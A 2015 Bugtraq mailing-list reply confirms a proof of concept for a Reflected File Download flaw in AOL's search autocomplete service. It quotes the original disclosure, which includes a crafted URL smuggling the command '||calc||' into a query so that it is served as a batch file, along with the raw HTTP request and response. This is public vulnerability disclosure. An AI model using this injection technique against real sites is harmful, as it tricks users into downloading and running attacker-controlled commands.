[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <D107D4CF.1BE64%mikeantcliffe@logicallysecure.com>
Date: Mon, 16 Feb 2015 17:11:17 +0000
From: Mike Antcliffe <mikeantcliffe@...icallysecure.com>
To: Ricardo Iramar dos Santos <riramar@...il.com>,
"bugtraq@...urityfocus.com" <bugtraq@...urityfocus.com>
Subject: Re: Reflected File Download in AOL Search Website
PoC confirmed to work with Safari 8.0.3 on OSx 10.10.2
Good find!
On 16/02/2015 16:15, "Ricardo Iramar dos Santos" <riramar@...il.com> wrote:
>Oren Hafif reported a new kind of attack called Reflected File
>Download
>(https://www.blackhat.com/eu-14/briefings.html#reflected-file-download-a-n
>ew-web-attack-vector)
>in Black Hat Europe 2014 conference.
>More details about the attack you can found in his public
>presentation:
>https://www.blackhat.com/docs/eu-14/materials/eu-14-Hafif-Reflected-File-D
>ownload-A-New-Web-Attack-Vector.pdf.
>Google and Bing have already fixed the vulnerability but I've found
>the same vulnerability in AOL Search Website.
>A malicious user could send the link below to a victim that you
>download a malicious batch file from autocomplete.search.aol.com
>domain.
>In the link below we have search for 'iramar "||calc||' using the AOL
>autocomplete domain. The browser will encode the double quotes but the
>server will escape it (\") and return inside the json on the body
>response.
>Since the response has the header "Content-Type:
>application/x-suggestions+json;charset=UTF-8" the browser will
>automatically try to download the reflected file. Chrome didn't try to
>download the file but Internet Explorer and Firefox will.
>
>http://autocomplete.search.aol.com/autocomplete/get;calc.bat?q=iramar"||ca
>lc||&it=ws-landing&dict=en_us_search&count=8&output=json
>
>REQUEST
>GET
>http://autocomplete.search.aol.com/autocomplete/get;calc.bat?q=iramar%22||
>calc||&it=ws-landing&dict=en_us_search&count=8&output=json
>HTTP/1.1
>Host: autocomplete.search.aol.com
>User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0)
>Gecko/20100101 Firefox/33.0
>Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
>Accept-Language: en-US,en;q=0.5
>Accept-Encoding: gzip, deflate
>Cookie: ...
>Connection: keep-alive
>
>
>RESPONSE
>HTTP/1.1 200 OK
>Date: Tue, 21 Oct 2014 10:30:34 GMT
>Server: Apache-Coyote/1.1
>Content-Type: application/x-suggestions+json;charset=UTF-8
>Content-Language: en-US
>Content-Length: 24
>Keep-Alive: timeout=5, max=10
>Connection: Keep-Alive
>
>["iramar\"||calc||", []]
Powered by blists - more mailing lists